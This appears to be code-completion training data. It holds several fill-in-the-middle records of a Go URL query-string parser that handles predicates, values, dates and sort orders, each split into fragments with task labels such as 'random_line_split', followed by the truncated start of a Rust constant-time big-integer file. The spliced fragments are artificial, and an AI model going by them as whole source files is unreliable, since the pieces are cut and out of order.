return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func parsePredicate(s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
| for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
}
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
} | func parseSortOrders(s string) (os []*SortOrder, n string) {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 { | random_line_split |
parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ {
characters[i] = 5
}
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func parsePredicate(s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
func parseSortOrders(s string) (os []*SortOrder, n string) |
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
}
| {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 {
for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
} | identifier_body |
parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ |
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func parsePredicate(s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
func parseSortOrders(s string) (os []*SortOrder, n string) {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 {
for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
}
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
}
| {
characters[i] = 5
} | conditional_block |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
